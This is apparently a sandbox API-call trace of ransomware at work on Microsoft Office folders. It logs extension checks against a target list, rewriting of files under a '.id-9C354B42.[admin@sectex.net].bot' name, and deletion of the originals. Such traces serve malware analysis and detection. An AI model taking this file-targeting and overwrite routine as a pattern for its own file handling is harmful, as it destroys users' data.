	[0139.169] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1463568) returned 1
	[0139.169] CloseHandle (hObject=0x384) returned 1
	[0139.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll")) returned 0x20
	[0139.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.169] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.169] lstrlenW (lpString=".doc") returned 4
	[0139.169] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0139.169] lstrlenW (lpString=".docx") returned 5
	[0139.169] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1
	[0139.169] lstrlenW (lpString=".pdf") returned 4
	[0139.169] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0139.169] lstrlenW (lpString=".xls") returned 4
	[0139.169] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0139.169] lstrlenW (lpString=".xlsx") returned 5
	[0139.169] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1
	[0139.169] lstrlenW (lpString=".ppt") returned 4
	[0139.169] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0139.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.169] lstrlenW (lpString=".zip") returned 4
	[0139.169] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0139.169] lstrlenW (lpString=".rar") returned 4
	[0139.170] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0139.170] lstrlenW (lpString=".bz2") returned 4
	[0139.170] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0139.170] lstrlenW (lpString=".7z") returned 3
	[0139.170] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0139.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.170] lstrlenW (lpString=".dbf") returned 4
	[0139.170] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0139.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.170] lstrlenW (lpString=".1cd") returned 4
	[0139.170] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0139.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.170] lstrlenW (lpString=".jpg") returned 4
	[0139.170] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0139.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.170] lstrlenW (lpString=".doc") returned 4
	[0139.170] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0139.170] lstrlenW (lpString=".docx") returned 5
	[0139.170] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1
	[0139.170] lstrlenW (lpString=".pdf") returned 4
	[0139.170] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0139.170] lstrlenW (lpString=".xls") returned 4
	[0139.170] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0139.170] lstrlenW (lpString=".xlsx") returned 5
	[0139.170] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1
	[0139.170] lstrlenW (lpString=".ppt") returned 4
	[0139.170] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0139.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.170] lstrlenW (lpString=".zip") returned 4
	[0139.170] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0139.170] lstrlenW (lpString=".rar") returned 4
	[0139.170] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0139.170] lstrlenW (lpString=".bz2") returned 4
	[0139.171] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0139.171] lstrlenW (lpString=".7z") returned 3
	[0139.171] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0139.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.171] lstrlenW (lpString=".dbf") returned 4
	[0139.171] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0139.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.171] lstrlenW (lpString=".1cd") returned 4
	[0139.171] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0139.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pidgenx.dll") returned 91
	[0139.171] lstrlenW (lpString=".jpg") returned 4
	[0139.171] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0139.171] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bot") returned 1
	[0139.171] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24
	[0139.171] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.335] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=715834) returned 1
	[0139.335] CloseHandle (hObject=0x398) returned 1
	[0139.335] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms")) returned 0x20
	[0139.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.360] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.360] lstrlenW (lpString=".doc") returned 4
	[0139.360] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1
	[0139.360] lstrlenW (lpString=".docx") returned 5
	[0139.360] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1
	[0139.360] lstrlenW (lpString=".pdf") returned 4
	[0139.360] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1
	[0139.360] lstrlenW (lpString=".xls") returned 4
	[0139.360] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1
	[0139.360] lstrlenW (lpString=".xlsx") returned 5
	[0139.360] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1
	[0139.360] lstrlenW (lpString=".ppt") returned 4
	[0139.360] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1
	[0139.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.360] lstrlenW (lpString=".zip") returned 4
	[0139.360] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1
	[0139.360] lstrlenW (lpString=".rar") returned 4
	[0139.360] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1
	[0139.360] lstrlenW (lpString=".bz2") returned 4
	[0139.360] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1
	[0139.360] lstrlenW (lpString=".7z") returned 3
	[0139.360] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1
	[0139.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.361] lstrlenW (lpString=".dbf") returned 4
	[0139.361] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.361] lstrlenW (lpString=".1cd") returned 4
	[0139.361] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.361] lstrlenW (lpString=".jpg") returned 4
	[0139.361] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.361] lstrlenW (lpString=".doc") returned 4
	[0139.361] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString=".docx") returned 5
	[0139.361] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1
	[0139.361] lstrlenW (lpString=".pdf") returned 4
	[0139.361] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString=".xls") returned 4
	[0139.361] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString=".xlsx") returned 5
	[0139.361] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1
	[0139.361] lstrlenW (lpString=".ppt") returned 4
	[0139.361] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.361] lstrlenW (lpString=".zip") returned 4
	[0139.361] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString=".rar") returned 4
	[0139.361] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString=".bz2") returned 4
	[0139.361] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1
	[0139.361] lstrlenW (lpString=".7z") returned 3
	[0139.361] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1
	[0139.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.361] lstrlenW (lpString=".dbf") returned 4
	[0139.361] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1
	[0139.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.362] lstrlenW (lpString=".1cd") returned 4
	[0139.362] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1
	[0139.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104
	[0139.362] lstrlenW (lpString=".jpg") returned 4
	[0139.362] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1
	[0139.362] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0139.362] lstrlenW (lpString="RICHED20.DLL") returned 12
	[0139.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360
	[0139.364] GetFileSizeEx (in: hFile=0x360, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=1870696) returned 1
	[0139.365] CloseHandle (hObject=0x360) returned 1
	[0139.365] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll")) returned 0x20
	[0139.365] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.365] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 68
	[0139.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 68
	[0139.365] lstrlenW (lpString=".doc") returned 4
	[0139.365] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0139.365] lstrlenW (lpString=".docx") returned 5
	[0139.365] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1
	[0139.365] lstrlenW (lpString=".pdf") returned 4
	[0139.365] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0139.365] lstrlenW (lpString=".xls") returned 4
	[0139.365] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0139.365] lstrlenW (lpString=".xlsx") returned 5
	[0139.365] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1
	[0139.365] lstrlenW (lpString=".ppt") returned 4
	[0139.365] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0139.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 68
	[0139.365] lstrlenW (lpString=".zip") returned 4
	[0139.365] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0139.365] lstrlenW (lpString=".rar") returned 4
	[0139.365] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0139.365] lstrlenW (lpString=".bz2") returned 4
	[0139.365] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0139.365] lstrlenW (lpString=".7z") returned 3
	[0139.365] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0139.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL") returned 68
	[0139.366] lstrlenW (lpString=".dbf") returned 4
	[0139.366] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0139.470] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.477] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.499] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0140.026] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=9322) returned 1
	[0140.026] CloseHandle (hObject=0x3a4) returned 1
	[0140.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid")) returned 0x20
	[0140.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0140.073] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.073] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.081] GetLastError () returned 0x0
	[0140.081] ReadFile (in: hFile=0x37c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x246a, lpOverlapped=0x0) returned 1
	[0140.092] WriteFile (in: hFile=0x31c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x2470, lpOverlapped=0x0) returned 1
	[0140.093] ReadFile (in: hFile=0x37c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.093] WriteFile (in: hFile=0x31c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.093] SetEndOfFile (hFile=0x31c) returned 1
	[0140.093] CloseHandle (hObject=0x31c) returned 1
	[0140.094] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.094] SetEndOfFile (hFile=0x37c) returned 1
	[0140.097] CloseHandle (hObject=0x37c) returned 1
	[0140.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.119] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid")) returned 1
	[0140.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.119] lstrlenW (lpString=".doc") returned 4
	[0140.119] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.119] lstrlenW (lpString=".docx") returned 5
	[0140.119] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.119] lstrlenW (lpString=".pdf") returned 4
	[0140.119] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.119] lstrlenW (lpString=".xls") returned 4
	[0140.119] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.119] lstrlenW (lpString=".xlsx") returned 5
	[0140.119] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.119] lstrlenW (lpString=".ppt") returned 4
	[0140.119] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.119] lstrlenW (lpString=".zip") returned 4
	[0140.119] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.119] lstrlenW (lpString=".rar") returned 4
	[0140.119] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.119] lstrlenW (lpString=".bz2") returned 4
	[0140.119] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.120] lstrlenW (lpString=".7z") returned 3
	[0140.120] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.120] lstrlenW (lpString=".dbf") returned 4
	[0140.120] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.120] lstrlenW (lpString=".1cd") returned 4
	[0140.120] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.120] lstrlenW (lpString=".jpg") returned 4
	[0140.120] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.120] lstrlenW (lpString=".doc") returned 4
	[0140.120] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.120] lstrlenW (lpString=".docx") returned 5
	[0140.120] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.120] lstrlenW (lpString=".pdf") returned 4
	[0140.120] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.120] lstrlenW (lpString=".xls") returned 4
	[0140.120] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.120] lstrlenW (lpString=".xlsx") returned 5
	[0140.120] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.120] lstrlenW (lpString=".ppt") returned 4
	[0140.120] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.120] lstrlenW (lpString=".zip") returned 4
	[0140.120] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.120] lstrlenW (lpString=".rar") returned 4
	[0140.120] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.120] lstrlenW (lpString=".bz2") returned 4
	[0140.120] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.120] lstrlenW (lpString=".7z") returned 3
	[0140.121] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.121] lstrlenW (lpString=".dbf") returned 4
	[0140.121] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.121] lstrlenW (lpString=".1cd") returned 4
	[0140.121] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63
	[0140.121] lstrlenW (lpString=".jpg") returned 4
	[0140.121] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.121] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.121] lstrlenW (lpString="HTECH_01.MID") returned 12
	[0140.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HTECH_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\htech_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.121] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=7178) returned 1
